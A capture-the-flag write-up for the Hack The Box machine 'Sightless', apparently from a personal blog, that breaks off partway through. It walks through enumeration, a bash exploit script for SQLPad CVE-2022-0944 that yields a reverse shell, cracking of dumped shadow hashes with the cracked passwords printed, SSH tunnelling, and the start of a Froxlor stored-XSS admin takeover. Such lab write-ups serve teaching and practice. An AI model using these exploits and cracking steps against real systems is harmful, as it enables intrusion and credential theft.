Post

Sightless

Sightless

Summary

Sightless (HTB) involves exploiting SQLPad (CVE-2022-0944) for RCE via Node.js injection, gaining a Docker shell. Cracking hashes with John yields SSH access as michael. A stored XSS (CVE-2024-34070) in Froxlor creates an admin account, exposing FTP credentials to retrieve a KeePass DB. Cracking its password reveals root’s SSH key for final access. Alternate paths include abusing Chrome’s remote debugging (automated john processes) or PHP-FPM misconfigurations.

Nmap

1
2
3
4
5
6
7
8
9
10
11
└─# nmap -p- --min-rate 10000 $box -oA nmap/port-scan
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-11 08:04 IST
Nmap scan report for 10.10.11.32
Host is up (0.43s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 14.35 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─# nmap -sC -sV -p21,22,80 $box -oA nmap/scripts
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-11 08:06 IST
Nmap scan report for 10.10.11.32
Host is up (0.38s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings:
|   GenericLines:
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=1/11%Time=6781D93F%P=aarch64-unknown-linux-gnu%
SF:r(GenericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\
SF:x20Server\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\
SF:x20try\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20tr
SF:y\x20being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.23 seconds

FTP - 21,22

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└─# ftp $box -p 21
Connected to 10.10.11.32.
220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
Name (10.10.11.32:kali): anonymous
550 SSL/TLS required on the control channel
ftp: Login failed
ftp> ls
550 SSL/TLS required on the control channel
Passive mode refused.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> ls
550 SSL/TLS required on the control channel
ftp: Can't bind for data connection: Address already in use
ftp> passive
Passive mode: on; fallback to active mode: on.
ftp> active
?Invalid command.
ftp> ls
550 SSL/TLS required on the control channel
550 SSL/TLS required on the control channel
ftp> bye
221 Goodbye.

It looks like we need credentials to connect

HTTP - 80

In our nmap scan we saw that the redirect failed

We can add sightless.htb to our /etc/hosts and then try again

image.webp

image.webp

Let’s add sqlpad.sightless.htb to our /etc/hosts too

image.webp

image.webp

Looks like we can create an access time period for our connections

Gobuster

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─# gobuster dir -u http://sightless.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30 -o gobuster-med-x
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://sightless.htb/
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 178] [--> http://sightless.htb/images/]
/icones               (Status: 301) [Size: 178] [--> http://sightless.htb/icones/]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

Sqlpad

image.webp

image.webp

The image looks like the site on our domain, sqlpad.sightless.htb

CVE-2022-0944 - Root

There is a CVE-2022-0944 for this version of sqlpad

Template injection

I found a script for running the exploit,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
#!/bin/bash

# Inform the user to run netcat manually
echo "Please make sure to start a listener on your attacking machine using the command:"
echo "nc -lvnp 9001"
echo "Waiting for you to set up the listener..."

# Pause for confirmation from the user before continuing
read -p "Press [Enter] when you are ready..."

# Prompt the user for the target server and attacker's IP address
echo "Please provide the target host (e.g., x.x.com): "; read TARGET
echo "Please provide your IP address (e.g., 10.10.16.3): "; read REVERSE_IP

# Set reverse port for connection
REVERSE_PORT=9001

# Prepare the POST data with the payload injected in the 'host' and 'database' fields
POST_DATA=$(cat <<EOF
{
  "name": "divineclown",
  "driver": "mysql",
  "data": {
    "host": "",
    "database": ""
  },
  "host": "",
  "database": ""
}
EOF
)

# Perform the POST request using curl to trigger the payload on the target server
curl -i -s -k -X POST -H "Host: $TARGET" -H "Accept: application/json" -H "Content-Type: application/json" -H "Origin: http://$TARGET" -H "Referer: http://$TARGET/queries/new" -H "Connection: keep-alive" --data-binary "$POST_DATA" "http://$TARGET/api/test-connection" > /dev/null

echo "Exploit sent. If everything went well, check your listener for a connection on port $REVERSE_PORT."
  • The reverse shell exploit
    1. Listener Setup: Prompts the user to start a Netcat listener on port 9001 for capturing the reverse shell connection.
    2. Input Collection: Requests the target host and attacker’s IP address as input.
    3. Payload Creation: Constructs a JSON payload with malicious code injected in the host and database fields. The payload uses Node.js’s child_process module to execute a reverse shell command.
    4. Exploit Execution: Sends the crafted payload via a POST request to the target server’s /api/test-connection endpoint using curl.
    5. Reverse Shell: If the server is vulnerable, it executes the payload, opening a reverse shell to the attacker on port 9001.

    This tool automates exploitation by leveraging the server’s ability to execute injected code.

1
2
3
4
5
6
7
8
9
10
└─# ./exploit.sh
Please make sure to start a listener on your attacking machine using the command:
nc -lvnp 9001
Waiting for you to set up the listener...
Press [Enter] when you are ready...
Please provide the target host (e.g., x.x.com):
sqlpad.sightless.htb
Please provide your IP address (e.g., 10.10.16.3):
10.10.16.6
Exploit sent. If everything went well, check your listener for a connection on port 9001.
1
2
3
4
5
6
7
8
└─# rlwrap nc -nvlp 9001
listening on [any] 9001 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.32] 53198
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@c184118df0a6:/var/lib/sqlpad# id
id
uid=0(root) gid=0(root) groups=0(root)

But there are no flags that we can find under any user and anywhere,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
root@c184118df0a6:/home/michael# ls -la
ls -la
total 24
drwxr-xr-x 2 michael michael 4096 Aug  9 09:42 .
drwxr-xr-x 1 root    root    4096 Aug  6 11:23 ..
lrwxrwxrwx 1 root    root       9 Aug  9 09:42 .bash_history -> /dev/null
-rw-r--r-- 1 michael michael  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 michael michael 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 michael michael  807 Apr 18  2019 .profile
root@c184118df0a6:/home/michael# cd ../node
cd ../node
root@c184118df0a6:/home/node# ls -la
ls -la
total 24
drwxr-xr-x 1 node node 4096 Aug  9 09:42 .
drwxr-xr-x 1 root root 4096 Aug  6 11:23 ..
lrwxrwxrwx 1 root root    9 Aug  9 09:42 .bash_history -> /dev/null
-rw-r--r-- 1 node node  220 Apr 18  2019 .bash_logout
-rw-r--r-- 1 node node 3526 Apr 18  2019 .bashrc
-rw-r--r-- 1 node node  807 Apr 18  2019 .profile
root@c184118df0a6:/home/node# cd ..
cd ..
root@c184118df0a6:/home# ls -la
ls -la
total 20
drwxr-xr-x 1 root    root    4096 Aug  6 11:23 .
drwxr-xr-x 1 root    root    4096 Aug  2 09:30 ..
drwxr-xr-x 2 michael michael 4096 Aug  9 09:42 michael
drwxr-xr-x 1 node    node    4096 Aug  9 09:42 node
root@c184118df0a6:/home# cd /root
cd /root
root@c184118df0a6:~# ls
ls
root@c184118df0a6:~# ls -la
ls -la
total 28
drwx------ 1 root root 4096 Aug  9 09:42 .
drwxr-xr-x 1 root root 4096 Aug  2 09:30 ..
lrwxrwxrwx 1 root root    9 Aug  9 09:42 .bash_history -> /dev/null
-rw-r--r-- 1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x 3 root root 4096 Aug  2 09:30 .cache
drwx------ 1 root root 4096 Mar  2  2022 .gnupg
drwxr-xr-x 3 root root 4096 Mar  2  2022 .npm
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile

But only later I realized that the shell, root@c184118df0a6,look looks like it is running inside a docker container

Shell as michael

1
2
3
4
5
root@c184118df0a6:~# cat /etc/passwd | grep 'sh$'
cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
node:x:1000:1000::/home/node:/bin/bash
michael:x:1001:1001::/home/michael:/bin/bash
1
2
3
4
root@c184118df0a6:~# cat /etc/shadow | grep '\$'
cat /etc/shadow | grep '\$'
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7:::
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::

Let’s unshadow the files and then run john to extract the password

1
2
3
4
5
6
7
8
9
10
11
12
└─# unshadow passwd shadow
Created directory: /root/.john
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:0:0:root:/root:/bin/bash
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:1001:1001::/home/michael:/bin/bash

┌──(root㉿kali)-[~/htb/sightless]
└─# unshadow passwd shadow > unshadowed_pwd

┌──(root㉿kali)-[~/htb/sightless]
└─# cat unshadowed_pwd
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:0:0:root:/root:/bin/bash
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:1001:1001::/home/michael:/bin/bash

John the Ripper

1
2
3
4
5
6
7
8
9
10
11
└─# john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed_pwd
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blindside        (root)
insaneclownposse (michael)
2g 0:00:00:43 DONE (2025-01-12 01:44) 0.04552g/s 1491p/s 2610c/s 2610C/s truckin..sabrina7
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We found root’s password to be blindside, and michael’s password to be insaneclownposse

SSH

The root ssh login is not permitted

1
2
3
4
5
└─# ssh root@10.10.11.32
root@10.10.11.32's password:
Permission denied, please try again.
root@10.10.11.32's password:
Permission denied, please try again.

We will try as michael

1
2
3
4
5
6
7
8
9
10
└─# ssh michael@10.10.11.32
The authenticity of host '10.10.11.32 (10.10.11.32)' can't be established.
ED25519 key fingerprint is SHA256:L+MjNuOUpEDeXYX6Ucy5RCzbINIjBx2qhJQKjYrExig.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.32' (ED25519) to the list of known hosts.
michael@10.10.11.32's password:
Last login: Sat Jan 11 22:25:01 2025 from 10.10.16.2
michael@sightless:~$ id
uid=1000(michael) gid=1000(michael) groups=1000(michael)
1
2
3
4
michael@sightless:~$ ls
nm  user.txt
michael@sightless:~$ cat user.txt
e746xxxxxxxxxxxxxxxxxxxxxxxxxxxx

As michael we could get the user.txt file

Shell as root

1
2
3
4
michael@sightless:~$ cat /etc/passwd | grep 'sh$'
root:x:0:0:root:/root:/bin/bash
michael:x:1000:1000:michael:/home/michael:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/bash

Now as michael we can see there is new user john

Ps auxww

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
michael@sightless:~$ ps auxww
USER         PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
<....>
<....>
john        1131  0.0  0.0   2892   952 ?        Ss   Jan11   0:00 /bin/sh -c sleep 110 && /usr/bin/python3 /home/john/automation/administration.py
john        1132  0.0  0.0   2892   964 ?        Ss   Jan11   0:00 /bin/sh -c sleep 140 && /home/john/automation/healthcheck.sh
root        1135  0.0  0.2  15432  9320 ?        Ss   Jan11   0:00 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
root        1137  0.0  0.0  55228  1708 ?        Ss   Jan11   0:00 nginx: master process /usr/sbin/nginx -g daemon on; master_process on;
www-data    1138  0.0  0.1  55896  5560 ?        S    Jan11   0:00 nginx: worker process
www-data    1139  0.0  0.1  55896  6508 ?        S    Jan11   0:00 nginx: worker process
root        1145  0.0  0.7 225524 29656 ?        Ss   Jan11   0:02 /usr/sbin/apache2 -k start
root        1154  0.0  1.9 2051668 75828 ?       Ssl  Jan11   0:04 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
mysql       1155  0.5 10.7 1823052 424716 ?      Ssl  Jan11   5:33 /usr/sbin/mysqld
root        1373  0.0  0.0 1671944 3396 ?        Sl   Jan11   0:00 /usr/bin/docker-proxy -proto tcp -host-ip 127.0.0.1 -host-port 3000 -container-ip 172.17.0.2 -container-port 3000
root        1389  0.0  0.3 1238656 12636 ?       Sl   Jan11   0:08 /usr/bin/containerd-shim-runc-v2 -namespace moby -id c184118df0a6eb770d018766ef8e32c948924b0ba77d85ec04a32e50cbafcb3a -address /run/containerd/containerd.sock
root        1409  0.0  3.2 984260 128504 ?       Ssl  Jan11   0:04 node /usr/app/server.js
john        1499  0.0  0.6  33660 24696 ?        S    Jan11   0:27 /usr/bin/python3 /home/john/automation/administration.py
john        1500  0.2  0.3 33630172 14920 ?      Sl   Jan11   2:52 /home/john/automation/chromedriver --port=36481
john        1505  0.0  0.0      0     0 ?        Z    Jan11   0:00 [chromedriver] <defunct>
john        1511  0.4  2.8 34019516 113440 ?     Sl   Jan11   4:47 /opt/google/chrome/chrome --allow-pre-commit-input --disable-background-networking --disable-client-side-phishing-detection --disable-default-apps --disable-dev-shm-usage --disable-hang-monitor --disable-popup-blocking --disable-prompt-on-repost --disable-sync --enable-automation --enable-logging --headless --log-level=0 --no-first-run --no-sandbox --no-service-autorun --password-store=basic --remote-debugging-port=0 --test-type=webdriver --use-mock-keychain --user-data-dir=/tmp/.org.chromium.Chromium.4Q0AdW data:,
john        1513  0.0  0.0 33575860 3124 ?       Sl   Jan11   0:00 /opt/google/chrome/chrome_crashpad_handler --monitor-self-annotation=ptype=crashpad-handler --database=/tmp/Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=lsb-release=Ubuntu 22.04.4 LTS --annotation=plat=Linux --annotation=prod=Chrome_Headless --annotation=ver=125.0.6422.60 --initial-client-fd=6 --shared-client-connection
john        1517  0.0  1.4 34112456 56008 ?      S    Jan11   0:00 /opt/google/chrome/chrome --type=zygote --no-zygote-sandbox --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1513 --enable-crash-reporter
john        1518  0.0  1.4 34112452 56624 ?      S    Jan11   0:00 /opt/google/chrome/chrome --type=zygote --no-sandbox --enable-logging --headless --log-level=0 --headless --crashpad-handler-pid=1513 --enable-crash-reporter
john        1533  0.2  3.1 34363100 123148 ?     Sl   Jan11   2:56 /opt/google/chrome/chrome --type=gpu-process --no-sandbox --disable-dev-shm-usage --headless --ozone-platform=headless --use-angle=swiftshader-webgl --headless --crashpad-handler-pid=1513 --gpu-preferences=WAAAAAAAAAAgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --shared-files --fie
john        1536  0.1  2.2 33900068 87436 ?      Sl   Jan11   1:07 /opt/google/chrome/chrome --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --disable-dev-shm-usage --use-angle=swiftshader-webgl --use-gl=angle --headless --crashpad-handler-pid=1513 --shared-files=v8_context_snapshot_data:100 --field-trial-handle=3,i,6051004217639165703,10410944978201640982,262144 --disable-features=PaintHolding --variations-seed-version --enable-logging --log-level=0 --enable-crash-reporter
john        1564  2.2  3.8 1186800236 152404 ?   Sl   Jan11  21:42 /opt/google/chrome/chrome --type=renderer --headless --crashpad-handler-pid=1513 --no-sandbox --disable-dev-shm-usage --enable-automation --remote-debugging-port=0 --test-type=webdriver --allow-pre-commit-input --ozone-platform=headless --disable-gpu-compositing --lang=en-US --num-raster-threads=1 --renderer-client-id=5 --time-ticks-at-unix-epoch=-1736623799781546 --launc
john        1653  0.0  0.0   7372  3380 ?        S    Jan11   0:00 /bin/bash /home/john/automation/healthcheck.sh
root        3652  0.0  0.2 239656  8780 ?        Ssl  Jan11   0:00 /usr/libexec/upowerd
www-data    8564  0.1  0.7 227772 31444 ?        S    00:00   0:44 /usr/sbin/apache2 -k start
www-data    8565  0.1  0.7 227776 29196 ?        S    00:00   0:45 /usr/sbin/apache2 -k start
www-data    8566  0.1  0.7 227776 30292 ?        S    00:00   0:45 /usr/sbin/apache2 -k start
www-data    8567  0.1  0.7 227780 29540 ?        S    00:00   0:45 /usr/sbin/apache2 -k start
www-data    8568  0.1  0.7 301508 30292 ?        S    00:00   0:45 /usr/sbin/apache2 -k start
proftpd     8613  0.0  0.1  30352  6696 ?        SLs  00:00   0:01 proftpd: (accepting connections)
www-data    8620  0.1  0.7 301508 29952 ?        S    00:00   0:47 /usr/sbin/apache2 -k start
www-data   10900  0.1  0.7 227780 29224 ?        S    01:32   0:38 /usr/sbin/apache2 -k start
root       24090  0.0  0.0      0     0 ?        I    10:38   0:00 [kworker/u256:3-writeback]
root       24834  0.0  0.0      0     0 ?        I    11:09   0:00 [kworker/0:0-events]
root       24882  0.0  0.0      0     0 ?        I    11:09   0:00 [kworker/1:0-events]
root       25093  0.0  0.0      0     0 ?        I    11:18   0:00 [kworker/u256:1-events_unbound]
root       25526  0.0  0.0      0     0 ?        I    11:38   0:00 [kworker/0:2-events]
root       25574  0.0  0.0      0     0 ?        I    11:38   0:00 [kworker/1:2-events]
root       25841  0.0  0.0      0     0 ?        I    11:50   0:00 [kworker/u256:2-flush-253:0]
root       25915  0.0  0.2  17152 10384 ?        Ss   11:53   0:00 sshd: michael [priv]
michael    25918  0.0  0.2  17084  9604 ?        Ss   11:53   0:00 /lib/systemd/systemd --user
michael    25919  0.0  0.0 169296  3852 ?        S    11:53   0:00 (sd-pam)
root       25920  0.0  0.0      0     0 ?        I    11:53   0:00 [kworker/0:1-events]
michael    25926  0.0  0.2  17152  7972 ?        R    11:53   0:00 sshd: michael@pts/0
michael    25931  0.0  0.1   8808  5548 pts/0    Ss   11:54   0:00 -bash
john       26005  0.0  0.0   5772  1112 ?        S    11:56   0:00 sleep 60
michael    26020  0.0  0.0  10072  3524 pts/0    R+   11:56   0:00 ps auxww

The user john has some scripts and google chrome running

Opt

We can see that google chrome is installed in opt folder

1
2
3
4
michael@sightless:~$ ls /opt
containerd  google
michael@sightless:~$ ls /opt/google
chrome

Ngnix

1
2
michael@sightless:/etc/nginx/sites-enabled$ ls
default  main

There are two sites setup under ngnix directory

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
michael@sightless:/etc/nginx/sites-enabled$ cat default
server {
    listen *:80;
    server_name sightless.htb;

    location / {
        root /var/www/sightless;
        index index.html;
    }

    if ($host != sightless.htb) {
        rewrite ^ http://sightless.htb/;
    }
}
michael@sightless:/etc/nginx/sites-enabled$ cat main
server {
        listen 80;
        server_name sqlpad.sightless.htb;

        location / {
                proxy_pass http://localhost:3000;
                proxy_set_header Host $host;
                proxy_set_header X-Real-IP $remote_addr;
                proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        }
}

default handles the website sightless.htb

main handles the SQLpad

Apache

1
2
3
4
5
michael@sightless:/etc/apache2$ ls
apache2.conf  conf-available  conf-enabled  envvars  froxlor-htpasswd  magic  mods-available  mods-enabled  ports.conf  sites-available  sites-enabled
michael@sightless:/etc/apache2$ ls sites-enabled/
000-default.conf  05_froxlor_dirfix_nofcgid.conf              34_froxlor_normal_vhost_web1.sightless.htb.conf
002-sqlpad.conf   10_froxlor_ipandport_192.168.1.118.80.conf  40_froxlor_diroption_666d99c49b2986e75ed93e591b7eb6c8.conf

Sqlpad conf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
michael@sightless:/etc/apache2$ cat sites-enabled/002-sqlpad.conf
<VirtualHost *:80>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        ServerName sqlpad.sightless.htb
        ServerAlias sqlpad.sightless.htb
        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn
        ProxyPreserveHost On
        ProxyPass         / http://127.0.0.1:3000/
        ProxyPassReverse  / http://127.0.0.1:3000/

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

Froxler

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
michael@sightless:/etc/apache2$ cat sites-enabled/000-default.conf
<VirtualHost 127.0.0.1:8080>
        # The ServerName directive sets the request scheme, hostname and port that
        # the server uses to identify itself. This is used when creating
        # redirection URLs. In the context of virtual hosts, the ServerName
        # specifies what hostname must appear in the request's Host: header to
        # match this virtual host. For the default virtual host (this file) this
        # value is not decisive as it is used as a last resort host regardless.
        # However, you must set it for any further virtual host explicitly.
        #ServerName www.example.com

        ServerAdmin webmaster@localhost
        DocumentRoot /var/www/html/froxlor
        ServerName admin.sightless.htb
        ServerAlias admin.sightless.htb
        # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
        # error, crit, alert, emerg.
        # It is also possible to configure the loglevel for particular
        # modules, e.g.
        #LogLevel info ssl:warn

        ErrorLog ${APACHE_LOG_DIR}/error.log
        CustomLog ${APACHE_LOG_DIR}/access.log combined

        # For most configuration files from conf-available/, which are
        # enabled or disabled at a global level, it is possible to
        # include a line for only one particular virtual host. For example the
        # following line enables the CGI configuration for this host only
        # after it has been globally disabled with "a2disconf".
        #Include conf-available/serve-cgi-bin.conf
</VirtualHost>

# vim: syntax=apache ts=4 sw=4 sts=4 sr noet

It’s running on port 80

The file is also denied for entry, let’s check who is running in processes

Process

1
2
michael@sightless:~$ cd /var/www/html/froxlor
-bash: cd: /var/www/html/froxlor: Permission denied
1
2
3
4
michael@sightless:~$ netstat -tnlp | grep 8080
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -
1
2
michael@sightless:~$ ps auxww | grep 8080
michael    36173  0.0  0.0   6480  2264 pts/0    S+   18:59   0:00 grep --color=auto 8080

The site is run by the user michael

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
 michaelmichael@sightless:~$ curl -v localhost:8080
*   Trying 127.0.0.1:8080...
* Connected to localhost (127.0.0.1) port 8080 (#0)
> GET / HTTP/1.1
> Host: localhost:8080
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Sun, 12 Jan 2025 18:58:25 GMT
< Server: Apache/2.4.52 (Ubuntu)
< Set-Cookie: PHPSESSID=khii1g6roi31joitrdtnlodufd; expires=Sun, 12-Jan-2025 19:08:25 GMT; Max-Age=600; path=/; domain=localhost; HttpOnly; SameSite=Strict
< Expires: Sun, 12 Jan 2025 18:58:25 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Last-Modified: Sun, 12 Jan 2025 18:58:25 GMT
< Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; object-src 'self'; frame-src 'self'; frame-ancestors 'self';
< X-Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; object-src 'self'; frame-src 'self'; frame-ancestors 'self';
< X-WebKit-CSP: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; connect-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; object-src 'self'; frame-src 'self'; frame-ancestors 'self';
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Location: notice.html
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host localhost left intact

Since we have the credentials of michael’s, we can try to get a tunnel with port forwarding and check what is being run on the port

Tunnel

Explanation of L and R in ssh

L (Local Port Forwarding)

  • What it does: Forwards a port on your local machine to a destination through the remote server.
  • Use case: Access something on the remote network securely from your local machine.
  • Example:

    1
    2
    
      ssh -L 8080:example.com:80 user@remote-server
        
    
    • You access example.com:80 by connecting to localhost:8080.

R (Remote Port Forwarding)

  • What it does: Forwards a port on the remote server to a destination through your local machine.
  • Use case: Expose a local service (like a website or database) to the remote server.
  • Example:

    1
    2
    
      ssh -R 9090:localhost:3306 user@remote-server
        
    
    • Remote server accesses your local database (localhost:3306) via remote-server:9090.
OptionListens OnForwards ToCommon Use Case
-LLocal machine (client)Remote machine (server or beyond)Access remote resources securely from local.
-RRemote machine (server)Local machine (client or beyond)Expose local services to remote clients.
1
2
└─# ssh -N -f michael@sightless.htb -L 8080:localhost:8080
michael@sightless.htb's password:
  • cmd info
    • N: Do not execute commands or open an interactive shell. Only set up the port forwarding.
    • f: Run the SSH session in the background after authentication.

image.webp

To access the site let’s add this to ur /etc/hosts file

127.0.0.1 admin.sightless.htb

1
2
└─# cat /etc/hosts | tail -n 1
127.0.0.1       admin.sightless.htb

image.webp

CVE-2024-34070

CVE-2024-34070 is a Stored Blind Cross-Site Scripting (XSS) vulnerability in Froxlor’s Failed Login Attempts Logging feature, identified in versions prior to 2.1.9. It allowed an unauthenticated attacker to inject malicious scripts into the loginname parameter during failed login attempts. These scripts would execute when an administrator viewed the logs, potentially leading to unauthorized actions.

The issue was fixed in version 2.1.9 by implementing proper input sanitization and output encoding to prevent script execution. Users are advised to update to this version to mitigate the vulnerability.

image_8.webp

Froxlor Vulnerable to Blind XSS

Blind XSS Leading to Froxlor Application Compromise

The command injects and executes arbitrary JavaScript code via $emit.constructor in an AngularJS application. It extracts the CSRF token from a <meta> tag and sends a POST request to http://admin.sightless.htb:8080/admin_admins.php with parameters to create a new admin account (adminkit) with full privileges. The CSRF token is included in the request to bypass CSRF protection.

I will run Burpsuite and send a bad login credential on the app and then change the loginname with this payload and send via Repeater

1
